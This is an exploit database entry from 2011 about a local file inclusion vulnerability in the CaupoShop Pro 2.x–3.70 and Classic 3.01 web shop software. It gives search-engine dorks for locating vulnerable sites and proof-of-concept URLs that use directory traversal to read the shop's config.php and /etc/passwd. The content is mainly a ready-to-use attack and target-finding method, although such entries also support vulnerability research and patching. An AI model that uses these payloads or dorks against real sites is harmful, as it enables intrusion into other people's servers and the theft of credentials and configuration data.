CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 Local File Include Vulnerability

2011-11-01T00:00:00
ID 1337DAY-ID-17046
Type zdt
Reporter Rami Salama
Modified 2011-11-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability
-----------------------------------------------------------------------------------------
# Vuln Softwares :      CaupoShop Pro 2.x
            CaupoShop Classic 3.01
            CaupoShop Pro 3.70
# Discovered By :    Rami Salama
#Contact :      eng.ramisalama_[at]_gmail_[dot]_com
# Vendor  :     http://www.caupo.net
# Greets To :   All my colleagues and friends in MCIT scholarship at Raya Academy
#Dorks :        "powered by CaupoShop"
         inurl:index.php?action=template&template
 
#Exploit  :         http://127.0.0.1/[CaupoShop]/index.php?action=template&template=[LFI]
#POC :      http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../config.php
        http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../../../../etc/passwd
 
#28 October 2011 - Egypt



#  0day.today [2018-01-05]  #